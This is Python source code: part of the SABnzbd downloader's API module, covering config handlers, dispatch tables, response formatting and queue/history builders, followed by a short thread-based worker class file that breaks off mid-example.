show_hidden = kwargs.get("show_hidden_folders")
paths = folders_at_path(name, True, show_hidden)
return report(output, keyword="paths", data=paths)
def _api_config(name, output, kwargs):
""" API: Dispatcher for "config" """
if cfg.configlock():
return report(output, _MSG_CONFIG_LOCKED)
return _api_config_table.get(name, (_api_config_undefined, 2))[0](output, kwargs)
def _api_config_speedlimit(output, kwargs):
""" API: accepts output, value(=speed) """
value = kwargs.get("value")
if not value:
value = "0"
sabnzbd.Downloader.limit_speed(value)
return report(output)
def _api_config_get_speedlimit(output, kwargs):
""" API: accepts output """
return report(output, keyword="speedlimit", data=sabnzbd.Downloader.get_limit())
def _api_config_set_colorscheme(output, kwargs):
""" API: accepts output"""
value = kwargs.get("value")
if value:
cfg.web_color.set(value)
return report(output)
else:
return report(output, _MSG_NO_VALUE)
def _api_config_set_pause(output, kwargs):
""" API: accepts output, value(=pause interval) """
value = kwargs.get("value")
sabnzbd.Scheduler.plan_resume(int_conv(value))
return report(output)
def _api_config_set_apikey(output, kwargs):
""" API: accepts output """
cfg.api_key.set(config.create_api_key())
config.save_config()
return report(output, keyword="apikey", data=cfg.api_key())
def _api_config_set_nzbkey(output, kwargs):
""" API: accepts output """
cfg.nzb_key.set(config.create_api_key())
config.save_config()
return report(output, keyword="nzbkey", data=cfg.nzb_key())
def _api_config_regenerate_certs(output, kwargs):
# Make sure we only over-write default locations
result = False
if (
sabnzbd.cfg.https_cert() is sabnzbd.cfg.https_cert.default()
and sabnzbd.cfg.https_key() is sabnzbd.cfg.https_key.default()
):
https_cert = sabnzbd.cfg.https_cert.get_path()
https_key = sabnzbd.cfg.https_key.get_path()
result = create_https_certificates(https_cert, https_key)
sabnzbd.RESTART_REQ = True
return report(output, data=result)
def _api_config_test_server(output, kwargs):
""" API: accepts output, server-params """
result, msg = test_nntp_server_dict(kwargs)
response = {"result": result, "message": msg}
if output:
return report(output, data=response)
else:
return msg
def _api_config_undefined(output, kwargs):
""" API: accepts output """
return report(output, _MSG_NOT_IMPLEMENTED)
def _api_server_stats(name, output, kwargs):
""" API: accepts output """
sum_t, sum_m, sum_w, sum_d = sabnzbd.BPSMeter.get_sums()
stats = {"total": sum_t, "month": sum_m, "week": sum_w, "day": sum_d, "servers": {}}
for svr in config.get_servers():
t, m, w, d, daily = sabnzbd.BPSMeter.amounts(svr)
stats["servers"][svr] = {"total": t or 0, "month": m or 0, "week": w or 0, "day": d or 0, "daily": daily or {}}
return report(output, keyword="", data=stats)
def _api_gc_stats(name, output, kwargs):
"""Function only intended for internal testing of the memory handling"""
# Collect before we check
gc.collect()
# We cannot create any lists/dicts, as they would create a reference
return report(output, data=[str(obj) for obj in gc.get_objects() if isinstance(obj, sabnzbd.nzbstuff.TryList)])
##############################################################################
_api_table = {
"server_stats": (_api_server_stats, 2),
"get_config": (_api_get_config, 3),
"set_config": (_api_set_config, 3),
"set_config_default": (_api_set_config_default, 3),
"del_config": (_api_del_config, 3),
"queue": (_api_queue, 2),
"options": (_api_options, 2),
"translate": (_api_translate, 2),
"addfile": (_api_addfile, 1),
"retry": (_api_retry, 2),
"cancel_pp": (_api_cancel_pp, 2),
"addlocalfile": (_api_addlocalfile, 1),
"switch": (_api_switch, 2),
"change_cat": (_api_change_cat, 2),
"change_script": (_api_change_script, 2),
"change_opts": (_api_change_opts, 2),
"fullstatus": (_api_fullstatus, 2),
"history": (_api_history, 2),
"get_files": (_api_get_files, 2),
"addurl": (_api_addurl, 1),
"addid": (_api_addurl, 1),
"pause": (_api_pause, 2),
"resume": (_api_resume, 2),
"shutdown": (_api_shutdown, 3),
"warnings": (_api_warnings, 2),
"config": (_api_config, 2),
"get_cats": (_api_get_cats, 2),
"get_scripts": (_api_get_scripts, 2),
"version": (_api_version, 1),
"auth": (_api_auth, 1),
"restart": (_api_restart, 3),
"restart_repair": (_api_restart_repair, 2),
"disconnect": (_api_disconnect, 2),
"osx_icon": (_api_osx_icon, 3),
"gc_stats": (_api_gc_stats, 3),
"rescan": (_api_rescan, 2),
"eval_sort": (_api_eval_sort, 2),
"watched_now": (_api_watched_now, 2),
"resume_pp": (_api_resume_pp, 2),
"pause_pp": (_api_pause_pp, 2),
"rss_now": (_api_rss_now, 2),
"browse": (_api_browse, 2),
"retry_all": (_api_retry_all, 2),
"reset_quota": (_api_reset_quota, 2),
"test_email": (_api_test_email, 2),
"test_windows": (_api_test_windows, 2),
"test_notif": (_api_test_notif, 2),
"test_osd": (_api_test_osd, 2),
"test_pushover": (_api_test_pushover, 2),
"test_pushbullet": (_api_test_pushbullet, 2),
"test_prowl": (_api_test_prowl, 2),
"test_nscript": (_api_test_nscript, 2),
}
_api_queue_table = {
"delete": (_api_queue_delete, 2),
"delete_nzf": (_api_queue_delete_nzf, 2),
"rename": (_api_queue_rename, 2),
"change_complete_action": (_api_queue_change_complete_action, 2),
"purge": (_api_queue_purge, 2),
"pause": (_api_queue_pause, 2),
"resume": (_api_queue_resume, 2),
"priority": (_api_queue_priority, 2),
"sort": (_api_queue_sort, 2),
"rating": (_api_queue_rating, 2),
}
_api_config_table = {
"speedlimit": (_api_config_speedlimit, 2),
"set_speedlimit": (_api_config_speedlimit, 2),
"get_speedlimit": (_api_config_get_speedlimit, 2),
"set_colorscheme": (_api_config_set_colorscheme, 2),
"set_pause": (_api_config_set_pause, 2),
"set_apikey": (_api_config_set_apikey, 3),
"set_nzbkey": (_api_config_set_nzbkey, 3),
"regenerate_certs": (_api_config_regenerate_certs, 3),
"test_server": (_api_config_test_server, 2),
}
def api_level(cmd, name):
""" Return access level required for this API call """
if cmd in _api_table:
return _api_table[cmd][1]
if name == "queue" and cmd in _api_queue_table:
return _api_queue_table[cmd][1]
if name == "config" and cmd in _api_config_table:
return _api_config_table[cmd][1]
return 4
def report(output, error=None, keyword="value", data=None):
"""Report message in json, xml or plain text
If error is set, only an status/error report is made.
If no error and no data, only a status report is made.
Else, a data report is made (optional 'keyword' for outer XML section).
"""
if output == "json":
content = "application/json;charset=UTF-8"
if error:
info = {"status": False, "error": error}
elif data is None:
info = {"status": True}
else:
if hasattr(data, "__iter__") and not keyword:
info = data
else:
info = {keyword: data}
response = json.dumps(info).encode("utf-8")
elif output == "xml":
if not keyword:
# xml always needs an outer keyword, even when json doesn't
keyword = "result"
content = "text/xml"
xmlmaker = xml_factory()
if error:
status_str = xmlmaker.run("result", {"status": False, "error": error})
elif data is None:
status_str = xmlmaker.run("result", {"status": True})
else:
status_str = xmlmaker.run(keyword, data)
response = '<?xml version="1.0" encoding="UTF-8" ?>\n%s\n' % status_str
else:
content = "text/plain"
if error:
response = "error: %s\n" % error
elif not data:
response = "ok\n"
else:
response = "%s\n" % str(data)
cherrypy.response.headers["Content-Type"] = content
cherrypy.response.headers["Pragma"] = "no-cache"
return response
class xml_factory:
"""Recursive xml string maker. Feed it a mixed tuple/dict/item object and will output into an xml string
Current limitations:
In Two tiered lists hard-coded name of "item": <cat_list><item> </item></cat_list>
In Three tiered lists hard-coded name of "slot": <tier1><slot><tier2> </tier2></slot></tier1>
"""
def __init__(self):
self.__text = ""
def _tuple(self, keyw, lst):
text = []
for item in lst:
text.append(self.run(keyw, item))
return "".join(text)
def _dict(self, keyw, lst):
text = []
for key in lst.keys():
text.append(self.run(key, lst[key]))
if keyw:
return "<%s>%s</%s>\n" % (keyw, "".join(text), keyw)
else:
return ""
def _list(self, keyw, lst):
text = []
for cat in lst:
if isinstance(cat, dict):
text.append(self._dict(plural_to_single(keyw, "slot"), cat))
elif isinstance(cat, list):
text.append(self._list(plural_to_single(keyw, "list"), cat))
elif isinstance(cat, tuple):
text.append(self._tuple(plural_to_single(keyw, "tuple"), cat))
else:
if not isinstance(cat, str):
cat = str(cat)
name = plural_to_single(keyw, "item")
text.append("<%s>%s</%s>\n" % (name, xml_name(cat), name))
if keyw:
return "<%s>%s</%s>\n" % (keyw, "".join(text), keyw)
else:
return ""
def run(self, keyw, lst):
if isinstance(lst, dict):
text = self._dict(keyw, lst)
elif isinstance(lst, list):
text = self._list(keyw, lst)
elif isinstance(lst, tuple):
text = self._tuple(keyw, lst)
elif keyw:
text = "<%s>%s</%s>\n" % (keyw, xml_name(lst), keyw)
else:
text = ""
return text
def handle_server_api(output, kwargs):
""" Special handler for API-call 'set_config' [servers] """
name = kwargs.get("keyword")
if not name:
name = kwargs.get("name")
if name:
server = config.get_config("servers", name)
if server:
server.set_dict(kwargs)
old_name = name
else:
config.ConfigServer(name, kwargs)
old_name = None
sabnzbd.Downloader.update_server(old_name, name)
return name
def handle_rss_api(output, kwargs):
""" Special handler for API-call 'set_config' [rss] """
name = kwargs.get("keyword")
if not name:
name = kwargs.get("name")
if not name:
return None
feed = config.get_config("rss", name)
if feed:
feed.set_dict(kwargs)
else:
config.ConfigRSS(name, kwargs)
action = kwargs.get("filter_action")
if action in ("add", "update"):
# Use the general function, but catch the redirect-raise
try:
kwargs["feed"] = name
sabnzbd.interface.ConfigRss("/").internal_upd_rss_filter(**kwargs)
except cherrypy.HTTPRedirect:
pass
elif action == "delete":
# Use the general function, but catch the redirect-raise
try:
kwargs["feed"] = name
sabnzbd.interface.ConfigRss("/").internal_del_rss_filter(**kwargs)
except cherrypy.HTTPRedirect:
pass
return name
def handle_cat_api(output, kwargs):
""" Special handler for API-call 'set_config' [categories] """
name = kwargs.get("keyword")
if not name:
name = kwargs.get("name")
if not name:
return None
feed = config.get_config("categories", name)
if feed:
feed.set_dict(kwargs)
else:
config.ConfigCat(name, kwargs)
return name
def build_status(skip_dashboard=False, output=None):
# build up header full of basic information
info = build_header(trans_functions=not output)
info["logfile"] = sabnzbd.LOGFILE
info["weblogfile"] = sabnzbd.WEBLOGFILE
info["loglevel"] = str(cfg.log_level())
info["folders"] = sabnzbd.NzbQueue.scan_jobs(all_jobs=False, action=False)
info["configfn"] = config.get_filename()
# Dashboard: Speed of System
info["cpumodel"] = getcpu()
info["pystone"] = sabnzbd.PYSTONE_SCORE
# Dashboard: Speed of Download directory:
info["downloaddir"] = cfg.download_dir.get_clipped_path()
info["downloaddirspeed"] = sabnzbd.DOWNLOAD_DIR_SPEED
# Dashboard: Speed of Complete directory:
info["completedir"] = cfg.complete_dir.get_clipped_path()
info["completedirspeed"] = sabnzbd.COMPLETE_DIR_SPEED
# Dashboard: Measured download-speed
info["internetbandwidth"] = sabnzbd.INTERNET_BANDWIDTH
# Dashboard: Connection information
if not int_conv(skip_dashboard):
info["localipv4"] = localipv4()
info["publicipv4"] = publicipv4()
info["ipv6"] = ipv6()
# Dashboard: DNS-check
try:
addresslookup(cfg.selftest_host())
info["dnslookup"] = "OK"
except:
info["dnslookup"] = None
info["servers"] = []
servers = sorted(sabnzbd.Downloader.servers[:], key=lambda svr: "%02d%s" % (svr.priority, svr.displayname.lower()))
for server in servers:
serverconnections = []
connected = 0
for nw in server.idle_threads[:]:
if nw.connected:
connected += 1
for nw in server.busy_threads[:]:
article = nw.article
art_name = ""
nzf_name = ""
nzo_name = ""
if article:
nzf = article.nzf
nzo = nzf.nzo
art_name = article.article
# filename field is not always present
try:
nzf_name = nzf.filename
except: # attribute error
nzf_name = nzf.subject
nzo_name = nzo.final_name
# For the templates or for JSON
if output:
thread_info = {"thrdnum": nw.thrdnum, "art_name": art_name, "nzf_name": nzf_name, "nzo_name": nzo_name}
serverconnections.append(thread_info)
else:
serverconnections.append((nw.thrdnum, art_name, nzf_name, nzo_name))
if nw.connected:
connected += 1
if server.warning and not (connected or server.errormsg):
connected = server.warning
if server.request and not server.info:
connected = T(" Resolving address").replace(" ", "")
# For the templates or for JSON
if output:
server_info = {
"servername": server.displayname,
"serveractiveconn": connected,
"servertotalconn": server.threads,
"serverconnections": serverconnections,
"serverssl": server.ssl,
"serversslinfo": server.ssl_info,
"serveractive": server.active,
"servererror": server.errormsg,
"serverpriority": server.priority,
"serveroptional": server.optional,
}
info["servers"].append(server_info)
else:
info["servers"].append(
(
server.displayname,
"",
connected,
serverconnections,
server.ssl,
server.active,
server.errormsg,
server.priority,
server.optional,
)
)
info["warnings"] = sabnzbd.GUIHANDLER.content()
return info
def build_queue(start=0, limit=0, trans=False, output=None, search=None):
# build up header full of basic information
info, pnfo_list, bytespersec, q_size, bytes_left_previous_page = build_queue_header(
search=search, start=start, limit=limit, output=output
)
datestart = datetime.datetime.now()
limit = int_conv(limit)
start = int_conv(start)
info["refresh_rate"] = str(cfg.refresh_rate()) if cfg.refresh_rate() > 0 else ""
info["scripts"] = list_scripts()
info["categories"] = list_cats(output is None)
info["rating_enable"] = bool(cfg.rating_enable())
info["noofslots"] = q_size
info["start"] = start
info["limit"] = limit
info["finish"] = info["start"] + info["limit"]
n = start
running_bytes = bytes_left_previous_page
slotinfo = []
for pnfo in pnfo_list:
nzo_id = pnfo.nzo_id
bytesleft = pnfo.bytes_left
bytes_total = pnfo.bytes
average_date = pnfo.avg_date
is_propagating = (pnfo.avg_stamp + float(cfg.propagation_delay() * 60)) > time.time()
status = pnfo.status
priority = pnfo.priority
mbleft = bytesleft / MEBI
mb = bytes_total / MEBI
slot = {}
slot["index"] = n
slot["nzo_id"] = str(nzo_id)
slot["unpackopts"] = str(opts_to_pp(pnfo.repair, pnfo.unpack, pnfo.delete))
slot["priority"] = INTERFACE_PRIORITIES.get(priority, NORMAL_PRIORITY)
slot["script"] = pnfo.script if pnfo.script else "None"
slot["filename"] = pnfo.filename
slot["labels"] = pnfo.labels
slot["password"] = pnfo.password if pnfo.password else ""
slot["cat"] = pnfo.category if pnfo.category else "None"
slot["mbleft"] = "%.2f" % mbleft
slot["mb"] = "%.2f" % mb
slot["size"] = to_units(bytes_total, "B")
slot["sizeleft"] = to_units(bytesleft, "B")
slot["percentage"] = "%s" % (int(((mb - mbleft) / mb) * 100)) if mb != mbleft else "0"
slot["mbmissing"] = "%.2f" % (pnfo.bytes_missing / MEBI)
slot["direct_unpack"] = pnfo.direct_unpack
if not output:
slot["mb_fmt"] = locale.format_string("%d", int(mb), True)
slot["mbdone_fmt"] = locale.format_string("%d", int(mb - mbleft), True)
if not sabnzbd.Downloader.paused and status not in (Status.PAUSED, Status.FETCHING, Status.GRABBING):
if is_propagating:
slot["status"] = Status.PROP
elif status == Status.CHECKING:
slot["status"] = Status.CHECKING
else:
slot["status"] = Status.DOWNLOADING
else:
# Ensure compatibility of API status
if status == Status.DELETED or priority == FORCE_PRIORITY:
status = Status.DOWNLOADING
slot["status"] = "%s" % status
if (
sabnzbd.Downloader.paused
or sabnzbd.Downloader.postproc
or is_propagating
or status not in (Status.DOWNLOADING, Status.FETCHING, Status.QUEUED)
) and priority != FORCE_PRIORITY:
slot["timeleft"] = "0:00:00"
slot["eta"] = "unknown"
else:
running_bytes += bytesleft
slot["timeleft"] = calc_timeleft(running_bytes, bytespersec)
try:
datestart = datestart + datetime.timedelta(seconds=bytesleft / bytespersec)
# new eta format: 16:00 Fri 07 Feb
slot["eta"] = datestart.strftime(time_format("%H:%M %a %d %b"))
except:
datestart = datetime.datetime.now()
slot["eta"] = "unknown"
# Do not show age when it's not known
if average_date.year < 2000:
slot["avg_age"] = "-"
else:
slot["avg_age"] = calc_age(average_date, bool(trans))
rating = sabnzbd.Rating.get_rating_by_nzo(nzo_id)
slot["has_rating"] = rating is not None
if rating:
slot["rating_avg_video"] = rating.avg_video
slot["rating_avg_audio"] = rating.avg_audio
slotinfo.append(slot)
n += 1
if slotinfo:
info["slots"] = slotinfo
else:
info["slots"] = []
return info, pnfo_list, bytespersec
def fast_queue():
""" Return paused, bytes_left, bpsnow, time_left """
bytes_left = sabnzbd.sabnzbd.NzbQueue.remaining()
paused = sabnzbd.Downloader.paused
bpsnow = sabnzbd.BPSMeter.bps
time_left = calc_timeleft(bytes_left, bpsnow)
return paused, bytes_left, bpsnow, time_left
def build_file_list(nzo_id: str):
"""Build file lists for specified job"""
jobs = []
nzo = sabnzbd.sabnzbd.NzbQueue.get_nzo(nzo_id)
if nzo:
pnfo = nzo.gather_info(full=True)
finished_files = pnfo.finished_files
active_files = pnfo.active_files
queued_files = pnfo.queued_files
for nzf in finished_files:
jobs.append(
{
"filename": nzf.filename if nzf.filename else nzf.subject,
"mbleft": "%.2f" % (nzf.bytes_left / MEBI),
"mb": "%.2f" % (nzf.bytes / MEBI),
"bytes": "%.2f" % nzf.bytes,
"age": calc_age(nzf.date),
"nzf_id": nzf.nzf_id,
"status": "finished",
}
)
for nzf in active_files:
jobs.append(
{
"filename": nzf.filename if nzf.filename else nzf.subject,
"mbleft": "%.2f" % (nzf.bytes_left / MEBI),
"mb": "%.2f" % (nzf.bytes / MEBI),
"bytes": "%.2f" % nzf.bytes,
"age": calc_age(nzf.date),
"nzf_id": nzf.nzf_id,
"status": "active",
}
)
for nzf in queued_files:
jobs.append(
{
"filename": nzf.filename if nzf.filename else nzf.subject,
"set": nzf.setname,
"mbleft": "%.2f" % (nzf.bytes_left / MEBI),
"mb": "%.2f" % (nzf.bytes / MEBI),
"bytes": "%.2f" % nzf.bytes,
"age": calc_age(nzf.date),
"nzf_id": nzf.nzf_id,
"status": "queued",
}
)
return jobs
def options_list(output):
return report(
output,
keyword="options",
data={
"sabyenc": sabnzbd.decoder.SABYENC_ENABLED,
"par2": sabnzbd.newsunpack.PAR2_COMMAND,
"multipar": sabnzbd.newsunpack.MULTIPAR_COMMAND,
"rar": sabnzbd.newsunpack.RAR_COMMAND,
"zip": sabnzbd.newsunpack.ZIP_COMMAND,
"7zip": sabnzbd.newsunpack.SEVEN_COMMAND,
"nice": sabnzbd.newsunpack.NICE_COMMAND,
"ionice": sabnzbd.newsunpack.IONICE_COMMAND,
},
)
def retry_job(job, new_nzb=None, password=None):
""" Re enter failed job in the download queue """
if job:
history_db = sabnzbd.get_db_connection()
futuretype, url, pp, script, cat = history_db.get_other(job)
if futuretype:
nzo_id = sabnzbd.add_url(url, pp, script, cat)
else:
path = history_db.get_path(job)
nzo_id = sabnzbd.NzbQueue.repair_job(path, new_nzb, password)
if nzo_id:
# Only remove from history if we repaired something
history_db.remove_history(job)
return nzo_id
return None
def retry_all_jobs():
""" Re enter all failed jobs in the download queue """
# Fetch all retryable folders from History
items = sabnzbd.api.build_history()[0]
nzo_ids = []
for item in items:
if item["retry"]:
nzo_ids.append(retry_job(item["nzo_id"]))
return nzo_ids
def del_job_files(job_paths):
""" Remove files of each path in the list """
for path in job_paths:
if path and clip_path(path).lower().startswith(cfg.download_dir.get_clipped_path().lower()):
remove_all(path, recursive=True)
def del_hist_job(job, del_files):
""" Remove history element """
if job:
path = sabnzbd.PostProcessor.get_path(job)
if path:
sabnzbd.PostProcessor.delete(job, del_files=del_files)
else:
history_db = sabnzbd.get_db_connection()
remove_all(history_db.get_path(job), recursive=True)
history_db.remove_history(job)
def Tspec(txt):
""" Translate special terms """
if txt == "None":
return T("None")
elif txt in ("Default", "*"):
return T("Default")
else:
return txt
_SKIN_CACHE = {} # Stores pre-translated acronyms
def Ttemplate(txt):
"""Translation function for Skin texts
This special is to be used in interface.py for template processing
to be passed for the $T function: so { ..., 'T' : Ttemplate, ...}
"""
global _SKIN_CACHE
if txt in _SKIN_CACHE:
return _SKIN_CACHE[txt]
else:
# We need to remove the " and ' to be JS/JSON-string-safe
# Saving it in dictionary is 20x faster on next look-up
tra = T(SKIN_TEXT.get(txt, txt)).replace('"', """).replace("'", "'")
_SKIN_CACHE[txt] = tra
return tra
def clear_trans_cache():
""" Clean cache for skin translations """
global _SKIN_CACHE
_SKIN_CACHE = {}
sabnzbd.WEBUI_READY = True
def build_header(webdir="", output=None, trans_functions=True):
""" Build the basic header """
try:
uptime = calc_age(sabnzbd.START)
except:
uptime = "-"
speed_limit = sabnzbd.Downloader.get_limit()
if speed_limit <= 0:
speed_limit = 100
speed_limit_abs = sabnzbd.Downloader.get_limit_abs()
if speed_limit_abs <= 0:
speed_limit_abs = ""
diskspace_info = diskspace()
header = {}
# We don't output everything for API
if not output:
# These are functions, and cause problems for JSON
if trans_functions:
header["T"] = Ttemplate
header["Tspec"] = Tspec
header["uptime"] = uptime
header["color_scheme"] = sabnzbd.WEB_COLOR or ""
header["helpuri"] = "https://sabnzbd.org/wiki/"
header["restart_req"] = sabnzbd.RESTART_REQ
header["pid"] = os.getpid()
header["active_lang"] = cfg.language()
header["my_lcldata"] = clip_path(sabnzbd.DIR_LCLDATA)
header["my_home"] = clip_path(sabnzbd.DIR_HOME)
header["webdir"] = webdir or sabnzbd.WEB_DIR
header["url_base"] = cfg.url_base()
header["nt"] = sabnzbd.WIN32
header["darwin"] = sabnzbd.DARWIN
header["power_options"] = sabnzbd.WIN32 or sabnzbd.DARWIN or sabnzbd.LINUX_POWER
header["pp_pause_event"] = sabnzbd.Scheduler.pp_pause_event
header["apikey"] = cfg.api_key()
header["new_release"], header["new_rel_url"] = sabnzbd.NEW_VERSION
header["version"] = sabnzbd.__version__
header["paused"] = bool(sabnzbd.Downloader.paused or sabnzbd.Downloader.postproc)
header["pause_int"] = sabnzbd.Scheduler.pause_int()
header["paused_all"] = sabnzbd.PAUSED_ALL
header["diskspace1"] = "%.2f" % diskspace_info["download_dir"][1]
header["diskspace2"] = "%.2f" % diskspace_info["complete_dir"][1]
header["diskspace1_norm"] = to_units(diskspace_info["download_dir"][1] * GIGI)
header["diskspace2_norm"] = to_units(diskspace_info["complete_dir"][1] * GIGI)
header["diskspacetotal1"] = "%.2f" % diskspace_info["download_dir"][0]
header["diskspacetotal2"] = "%.2f" % diskspace_info["complete_dir"][0]
header["loadavg"] = loadavg()
header["speedlimit"] = "{1:0.{0}f}".format(int(speed_limit % 1 > 0), speed_limit)
header["speedlimit_abs"] = "%s" % speed_limit_abs
header["have_warnings"] = str(sabnzbd.GUIHANDLER.count())
header["finishaction"] = sabnzbd.QUEUECOMPLETE
header["quota"] = to_units(sabnzbd.BPSMeter.quota)
header["have_quota"] = bool(sabnzbd.BPSMeter.quota > 0.0)
header["left_quota"] = to_units(sabnzbd.BPSMeter.left)
anfo = sabnzbd.ArticleCache.cache_info()
header["cache_art"] = str(anfo.article_sum)
header["cache_size"] = to_units(anfo.cache_size, "B")
header["cache_max"] = str(anfo.cache_limit)
return header
def build_queue_header(search=None, start=0, limit=0, output=None):
""" Build full queue header """
header = build_header(output=output)
bytespersec = sabnzbd.BPSMeter.bps
qnfo = sabnzbd.NzbQueue.queue_info(search=search, start=start, limit=limit)
bytesleft = qnfo.bytes_left
bytes_total = qnfo.bytes
header["kbpersec"] = "%.2f" % (bytespersec / KIBI)
header["speed"] = to_units(bytespersec)
header["mbleft"] = "%.2f" % (bytesleft / MEBI)
header["mb"] = "%.2f" % (bytes_total / MEBI)
header["sizeleft"] = to_units(bytesleft, "B")
header["size"] = to_units(bytes_total, "B")
header["noofslots_total"] = qnfo.q_fullsize
if sabnzbd.Downloader.paused or sabnzbd.Downloader.postproc:
status = Status.PAUSED
elif bytespersec > 0:
status = Status.DOWNLOADING
else:
status = "Idle"
header["status"] = status
header["timeleft"] = calc_timeleft(bytesleft, bytespersec)
try:
datestart = datetime.datetime.now() + datetime.timedelta(seconds=bytesleft / bytespersec)
# new eta format: 16:00 Fri 07 Feb
header["eta"] = datestart.strftime(time_format("%H:%M %a %d %b"))
except:
header["eta"] = T("unknown")
return header, qnfo.list, bytespersec, qnfo.q_fullsize, qnfo.bytes_left_previous_page
def build_history(start=0, limit=0, search=None, failed_only=0, categories=None):
"""Combine the jobs still in post-processing and the database history"""
if not limit:
limit = 1000000
# Grab any items that are active or queued in postproc
postproc_queue = sabnzbd.PostProcessor.get_queue()
# Filter out any items that don't match the search term or category
if postproc_queue:
# It would be more efficient to iterate only once, but we accept the penalty for code clarity
if isinstance(search, list):
postproc_queue = [nzo for nzo in postproc_queue if nzo.cat in categories]
if isinstance(search, str):
# Replace * with .* and ' ' with .
search_text = search.strip().replace("*", ".*").replace(" ", ".*") + ".*?"
try:
re_search = re.compile(search_text, re.I)
postproc_queue = [nzo for nzo in postproc_queue if re_search.search(nzo.final_name)]
except:
logging.error(T("Failed to compile regex for search term: %s"), search_text)
# Multi-page support for postproc items
postproc_queue_size = len(postproc_queue)
if start > postproc_queue_size:
# On a page where we shouldn't show postproc items
postproc_queue = []
database_history_limit = limit
else:
try:
if limit:
postproc_queue = postproc_queue[start : start + limit]
else:
postproc_queue = postproc_queue[start:]
except:
pass
# Remove the amount of postproc items from the db request for history items
database_history_limit = max(limit - len(postproc_queue), 0)
database_history_start = max(start - postproc_queue_size, 0)
# Acquire the db instance
try:
history_db = sabnzbd.get_db_connection()
close_db = False
except:
# Required for repairs at startup because Cherrypy isn't active yet
history_db = HistoryDB()
close_db = True
# Fetch history items
if not database_history_limit:
items, fetched_items, total_items = history_db.fetch_history(
database_history_start, 1, search, failed_only, categories
)
items = []
else:
items, fetched_items, total_items = history_db.fetch_history(
database_history_start, database_history_limit, search, failed_only, categories
)
# Reverse the queue to add items to the top (faster than insert)
items.reverse()
# Add the postproc items to the top of the history
items = get_active_history(postproc_queue, items)
# Un-reverse the queue
items.reverse()
# Global check if rating is enabled
rating_enabled = cfg.rating_enable()
for item in items:
item["size"] = to_units(item["bytes"], "B")
if "loaded" not in item:
item["loaded"] = False
path = item.get("path", "")
item["retry"] = int_conv(item.get("status") == Status.FAILED and path and os.path.exists(path))
# Retry of failed URL-fetch
if item["report"] == "future":
item["retry"] = True
if rating_enabled:
rating = sabnzbd.Rating.get_rating_by_nzo(item["nzo_id"])
item["has_rating"] = rating is not None
if rating:
item["rating_avg_video"] = rating.avg_video
item["rating_avg_audio"] = rating.avg_audio
item["rating_avg_vote_up"] = rating.avg_vote_up
item["rating_avg_vote_down"] = rating.avg_vote_down
item["rating_user_video"] = rating.user_video
item["rating_user_audio"] = rating.user_audio
item["rating_user_vote"] = rating.user_vote
total_items += postproc_queue_size
fetched_items = len(items)
if close_db:
history_db.close()
return items, fetched_items, total_items
def get_active_history(queue, items):
""" Get the currently in progress and active history queue. """
for nzo in queue:
item = {}
(
item["completed"],
item["name"],
item["nzb_name"],
item["category"],
item["pp"],
item["script"],
item["report"],
item["url"],
item["status"],
item["nzo_id"],
item["storage"],
item["path"],
item["script_log"],
item["script_line"],
item["download_time"],
item["postproc_time"],
item["stage_log"],
item["downloaded"],
item["fail_message"],
item["url_info"],
item["bytes"],
_,
_,
item["password"],
) = build_history_info(nzo)
item["action_line"] = nzo.action_line
item = unpack_history_info(item)
item["loaded"] = nzo.pp_active
if item["bytes"]:
item["size"] = to_units(item["bytes"], "B")
else:
item["size"] = ""
items.append(item)
return items
def calc_timeleft(bytesleft, bps):
""" Calculate the time left in the format HH:MM:SS """
try:
if bytesleft <= 0:
return "0:00:00"
totalseconds = int(bytesleft / bps)
minutes, seconds = divmod(totalseconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
if minutes < 10:
minutes = "0%s" % minutes
if seconds < 10:
seconds = "0%s" % seconds
if days > 0:
if hours < 10:
hours = "0%s" % hours
return "%s:%s:%s:%s" % (days, hours, minutes, seconds)
else:
return "%s:%s:%s" % (hours, minutes, seconds)
except:
return "0:00:00"
def list_scripts(default=False, none=True):
""" Return a list of script names, optionally with 'Default' added """
lst = []
path = cfg.script_dir.get_path()
if path and os.access(path, os.R_OK):
for script in globber_full(path):
if os.path.isfile(script):
if (
(
sabnzbd.WIN32
and os.path.splitext(script)[1].lower() in PATHEXT
and not win32api.GetFileAttributes(script) & win32file.FILE_ATTRIBUTE_HIDDEN
)
or script.endswith(".py")
or (not sabnzbd.WIN32 and userxbit(script) and not os.path.basename(script).startswith("."))
):
lst.append(os.path.basename(script))
if none:
lst.insert(0, "None")
if default:
lst.insert(0, "Default")
return lst
def list_cats(default=True):
"""Return list of (ordered) categories,
when default==False use '*' for Default category
"""
lst = [cat["name"] for cat in config.get_ordered_categories()]
if default:
lst.remove("*")
lst.insert(0, "Default")
return lst
_PLURAL_TO_SINGLE = {
"categories": "category",
"servers": "server",
"rss": "feed",
"scripts": "script",
"warnings": "warning",
"files": "file",
"jobs": "job",
}
def plural_to_single(kw, def_kw=""):
try:
return _PLURAL_TO_SINGLE[kw]
except KeyError:
return def_kw
def del_from_section(kwargs):
""" Remove keyword in section """
section = kwargs.get("section", "")
if section in ("servers", "rss", "categories"):
keyword = kwargs.get("keyword")
if keyword:
item = config.get_config(section, keyword)
if item:
item.delete()
del item
config.save_config()
if section == "servers":
sabnzbd.Downloader.update_server(keyword, None)
return True
else:
return False
def history_remove_failed():
""" Remove all failed jobs from history, including files """
logging.info("Scheduled removal of all failed jobs")
with HistoryDB() as history_db:
del_job_files(history_db.get_failed_paths())
history_db.remove_failed()
def history_remove_completed():
""" Remove all completed jobs from history """
logging.info("Scheduled removal of all completed jobs")
with HistoryDB() as history_db:
history_db.remove_completed()
|
base_worker.py
|
# -*- coding: utf-8 -*-
# @Author: Macsnow
# @Date: 2017-05-15 14:03:39
# @Last Modified by: Macsnow
# @Last Modified time: 2017-05-19 17:01:33
from queue import Queue
from threading import Thread, Event
class WorkerExit(Exception):
pass
class BaseWorker(object):
def __init__(self):
self._mailbox = Queue()
super(BaseWorker, self).__init__()
def send(self, msg):
self._mailbox.put(msg)
def recv(self):
msg = self._mailbox.get()
if msg is WorkerExit:
raise WorkerExit()
return msg
def close(self):
self.send(WorkerExit)
def start(self):
self._terminated = Event()
t = Thread(target=self._bootstrap)
t.daemon = True
t.start()
def _bootstrap(self):
try:
self.run()
except WorkerExit:
pass
finally:
self._terminated.set()
def status(self):
return self._terminated.is_set()
def join(self):
self._terminated.wait()
def run(self):
raise NotImplementedError
class Worker(BaseWorker):
def recv_nowait(self):
if not self._mailbox.empty():
msg = self._mailbox.get()
if msg is WorkerExit:
raise WorkerExit()
return msg
if __name__ == '__main__':
class PrintActor(BaseWorker):
def run(self):
while True:
msg = self.recv()
